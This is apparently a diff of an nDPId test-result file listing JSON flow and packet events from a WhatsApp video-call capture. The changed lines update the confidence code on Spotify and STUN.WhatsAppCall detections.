-00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} +00640{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":1,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455764448,"flow_last_seen":1561455764448,"flow_idle_time":200000,"flow_min_l4_payload_len":44,"flow_max_l4_payload_len":44,"flow_tot_l4_payload_len":44,"flow_avg_l4_payload_len":44,"midstream":0,"thread_ts_msec":1561455764448,"l3_proto":"ip4","src_ip":"192.168.2.1","dst_ip":"192.168.2.255","src_port":57621,"dst_port":57621,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Spotify","breed":"Acceptable","category":"Music"}} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455767339,"flow_last_seen":1561455767339,"flow_idle_time":7580000,"flow_min_l4_payload_len":548,"flow_max_l4_payload_len":548,"flow_tot_l4_payload_len":548,"flow_avg_l4_payload_len":548,"midstream":1,"thread_ts_msec":1561455767339,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.20.53","src_port":49355,"dst_port":5222,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
01213{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":2,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1561455767339,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":614,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":614,"pkt_l4_len":580,"thread_ts_msec":1561455767339,"pkt":"xiwDYGpkkLkxKPrKCABFAAJYAABAAEAGw8bAqAIMnfAUNcDLFGab0R+KLuhMzoAYCAC1GwAAAQEICjTPJUoefmf9AAIh+FvbCnh\/a7IflRY0dljac\/EUrviXyMSuBINQo97GbKMEImMXigVRfinz4XcgTWeXa9giOjhsqf3NxGX9biqY1yfPHcFHJiCc0ZCHvaCNvgkJPVj4efQEO9oXblNeeRaKGRLTNPthw+X05ffa2MEEZsCc5sOdGdAvm7FUBTmDLJxrbHLFDC+Qz785Kp4Y\/nNC9dvuMTiwRIaMjyeDYd66NcNSVYXm4FIuAYawjSGgb9SDZkFGOfhJtHvzWqgQNk\/CQvD5MdFqw4Ro6oaWM5dtaU5byhQ5BGyiSFfIOfXO6utXNWA73iF5EEI1sUrW9Z96Yp1YyVWH1nWO8RF0xmRHhUXi8Z\/sZFez1+bI7zqAvAPYQUokFVSdoHMsl0C7omqMhJPL\/hGc9NtDl21eaiXOM52GOzZWxZMbXJmB\/9+NsouXUZBUgsh9jMSFGZLM23GdBqdyDiy78nD8F4EJr2A\/aUaJIwQnw3GNyvDzKtsy8d2KrzMKlf6d7qvFNf6tCn5YbJzbYCtXcK3bzzVNLm8QIxxktFuE4kwqNUk0pOIUno0bVHsn8uJRI7p6utCiNLoFNA283\/oV8xNqLi4LT4fQ\/\/415n+lAj9aAo0RTNMlYFu4h64\/Lu0dkox1O3c7ouf5f6puZ8pmi+uDZVI\/IU8sc3s7dCFETLgaxg8hmXkWbIHTksRKvfJv3iIyf9m9mqHEEfDnGMuE7VsJzvR+Imk61iI="} 00465{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":3,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1561455767391,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1561455767391,"pkt":"kLkxKPrKxiwDYGpkCABFAAA0cX4AAFMGgWyd8BQ1wKgCDBRmwMsu6EzOm9EhroAQALQFAQAAAQEICh5+dS80zyVK"} 
02360{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1561455767568,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1454,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1454,"pkt_l4_len":1420,"thread_ts_msec":1561455767568,"pkt":"kLkxKPrKxiwDYGpkCABFAAWgcX8AAFMGe\/+d8BQ1wKgCDBRmwMsu6EzOm9EhroAQALSeYwAAAQEICh5+deo0zyVKAAeY92kokkA7hrw6j6Vhkd+oEkvjt9+mUaq3VF5ALR\/3dyTIUqE+ce9A8zw57IwXMUm48Ve04aN2q3aoE1gIxi914RnbSua9WCw4BiKEAwBPqN8fZa53YGzu6KGDd+y61i8hb8APzgCq0BgVHxbqR0bN2PsZSNYDa\/cxDiPbHbN81oUvSJ1gG1HfKBlexobCedzu2sUfK2Qs2a4k4D1FAWNImtONV8L8QIDh9roN6NGgmn\/lqF1FSp0J1KRgd0jLjFjyO8E83j6fNPMnzyDyrqqDONC2kuu2acMixjEUltdGs477N1jzC9n+ER\/b\/S6TQcGEY9qe321iyRfAWuN0DLg7mjzkOAiLNEYzLk5mIXEf0ZRFKJwDAvOVHtFaYq9PK\/+TyWbUbh9dyV6FAMdUFiad1IPXICQYrOxMJpvYW44GNTJj7JJd\/vptPppVq\/RnqviVF+HvVQYCfsL\/SVoCMkJWYQL1ncdQ0eep1cbBr6nAtINm6y3vpk9iSvMUPjyihT4LCr1goaODAyLUwBnoKlcyQnCzrUTIAqAAM29AsZFrK3bZYGCyGW\/1MqA4MzwyfwMD1bF+saAkWfKpa6RSRkk3KGr6n6v79y+8bFqwHEmh79h64wuCdareEkcN59XiCjPB2jxFRkpLZWY0mc91mPUnIxaHkuQIMuo4JPBhS7O2C4sRkwc2EdliToDywQdgKCedjvE+Fkv+IJ1yiEuAY7OC0Yop8Phr2Qm2qT+26YDaaSkP6CBAA8F\/0qtcGuDnlIq3ve6KW\/D6MuF4EOQk1b\/mWeGOhmO2zaJtvFI8PxQT5VxpwG5mTmAHNrmnqHuX0IWL3zCefnedyGujv7ty3zJnVuQwRLy87IaxzKXwsdyDG3gOFStZBZK2qgn8IW\/xr0PRTCCbF58t6+kmge68BzSwUxMSja0zleeuWy9nliB9zaa4b+jN\/22Q56CpjAU0jeotHbt7rfwSgaDBMBcRXkBKkMuSRjHPsILIfuplVXUe9hbVn7Go2YVn3YMI8\/AExe4f\/h8AveIFQCrjpuBYwwenY\/QBLof\/waMaXnDMoOqv3UDo5f\/rUkCJZYja2kE\/3ozUaT8Uz0PCmt\/gc\/KCFNUf0Dg1W5QGc7mNzo6HmKq3sVYeKZxgXc+0B\/+Kg+WdAj0nr4z70bgW5GCi4QLhKZrELaubvCFff0BZt4Ss2ARFEyAH9IKD4jhRLgOIMULFRSu5xrKXDGooBaqIU\/671otysjRrQ81PzcJeLF2eHbj0voj\/+FWKEGjREDnwIqXWvMaPKFe8PlPupWBMwOzFz8pMa1\/Cfixow4NV+SRN1L2CcfmYjYCb8vwd81S0Sbh\/yjs0qpd5YLoB8pMYh\/yUoZ+FIXdWz+sa2pEUMxHkvUFc+7SzHNfV7LJOOBb6vDyxWLEcl4dY0FU+ynkwQS3op34TZEH4GA2VEfQdOgNR2iu4EKt2LFEXckrFDQqafGZhK5SjyixnKMbzvINk8a1d4ltQP
ewgraMY4ASPPuLS07U5UPA1qlh8E94Xhh8y1zAB0VWBPRDFRutgl1y4BL0Lad98ZYlvDZMJKhfwsfD1K84zCNVytc0lpEdS4WwTmG5jVDNkEok\/lFTqI9CJ\/ndHCOSY1DeCIemKT8q2EgY6ncZJwmIWq3s+IAWyQwqNpA+uXGEPONBjE53SU6ADJ7J2GkLvQbStohFZjKPShMILgTsEvkwNRe5icjnZF5b4X\/JteDZslY73Nte1q4DiPugbpWEOEW3UaXBVcccSnBXfsrY1lsgjH8BpxoTBACfj\/Nm3cIxvIq14OKHRvxy9b0mNen\/kzoDrO5sZ\/dAjHBdNu5W\/9k529dGB7vwkors="} 00583{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1561455769789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACaxMYAAEARfZvAqAIMHw1WMNG4DZYAhm0oAAMAaiESpEIMCJFuDJOtHXjqlExAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 
-00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00652{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"31.13.86.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":24,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1561455769789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACax74AAEAReqPAqAIMHw1WMNG4DZYAhm0nAAMAaiESpEIMCJFuDJOtHXjqlE1AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 
00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":1,"flow_last_seen":1561455769789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACaIVsAAEARBNTAqAIMuTzYM9G4DZYAhlDzAAMAaiESpEIMCJFuDJOtHXjqlE5AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} -00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":25,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769789,"flow_last_seen":1561455769789,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769789,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"185.60.216.51","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":26,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":4,"flow_packet_id":2,"flow_last_seen":1561455769789,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769789,"pkt":"xiwDYGpkkLkxKPrKCABFAACa3V0AAEARSNHAqAIMuTzYM9G4DZYAhlDyAAMAaiESpEIMCJFuDJOtHXjqlE9AAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":1,"flow_last_seen":1561455769790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaO9gAAEARHKbAqAIMnfDBMNG4DZYAhoNAAAMAaiESpEIMCJFuDJOtHXjqlFBAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":27,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.193.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
00609{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":28,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":2,"flow_last_seen":1561455769790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaLgUAAEARKnnAqAIMnfDBMNG4DZYAhoM\/AAMAaiESpEIMCJFuDJOtHXjqlFFAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00585{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":1,"flow_last_seen":1561455769790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACab00AAEAR1OTAqAIMszzAMNG4DZYAhm7yAAMAaiESpEIMCJFuDJOtHXjqlFJAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 
-00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} +00654{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":29,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769790,"flow_last_seen":1561455769790,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769790,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"179.60.192.48","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":30,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":6,"flow_packet_id":2,"flow_last_seen":1561455769790,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769790,"pkt":"xiwDYGpkkLkxKPrKCABFAACaCwQAAEAROS7AqAIMszzAMNG4DZYAhm7xAAMAaiESpEIMCJFuDJOtHXjqlFNAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 
00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":1,"flow_last_seen":1561455769791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769791,"pkt":"xiwDYGpkkLkxKPrKCABFAACaNcQAAEARH6zAqAIMnfDEPtG4DZYAhoAuAAMAaiESpEIMCJFuDJOtHXjqlFRAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} -00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 
+00655{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":31,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1561455769791,"flow_last_seen":1561455769791,"flow_idle_time":200000,"flow_min_l4_payload_len":126,"flow_max_l4_payload_len":126,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":126,"midstream":0,"thread_ts_msec":1561455769791,"l3_proto":"ip4","src_ip":"192.168.2.12","dst_ip":"157.240.196.62","src_port":53688,"dst_port":3478,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"STUN.WhatsAppCall","breed":"Acceptable","category":"VoIP"}} 00608{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":32,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":2,"flow_last_seen":1561455769791,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":168,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":168,"pkt_l4_len":134,"thread_ts_msec":1561455769791,"pkt":"xiwDYGpkkLkxKPrKCABFAACaC9gAAEARSZjAqAIMnfDEPtG4DZYAhoAtAAMAaiESpEIMCJFuDJOtHXjqlFVAAABmBQMCyDZF2ddgtlA0UBZWUTgM5bMiF47oTfkR8gxwf\/X6xPiwJonhfyRnCC\/1O3gjqwa36NKC7reorVrW4TGrS5w3rc3nItJV\/XceDJIdYAVMp2RD9UKe1LYtRXT0bfL9vCinKf9\/"} 00494{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":37,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1561455769802,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455769802,"pkt":"kLkxKPrKxiwDYGpkCABFAABI\/k4AAFQRMGUfDVYwwKgCDA2W0bgANE7GAQMAGCESpEIMCJFuDJOtHXjqlEwAIAAIAAHuJHGmBnJAAgAIAAABa44EONE="} 
00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":39,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":7,"flow_packet_id":3,"flow_last_seen":1561455769812,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455769812,"pkt":"kLkxKPrKxiwDYGpkCABFAABI3v0AAFMRY8Sd8MQ+wKgCDA2W0bgANGHGAQMAGCESpEIMCJFuDJOtHXjqlFQAIAAIAAHuJHGmBnJAAgAIAAABa44EONc="} 
@@ -34,51 +34,51 @@ 00493{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"wa_video.pcap","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1561455769823,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":86,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":86,"pkt_l4_len":52,"thread_ts_msec":1561455769823,"pkt":"kLkxKPrKxiwDYGpkCABFAABIblcAAFAR2nid8MEwwKgCDA2W0bgANGTSAQMAGCESpEIMCJFuDJOtHXjqlFAAIAAIAAHuJHGmBnJAAgAIAAABa44EON0="} 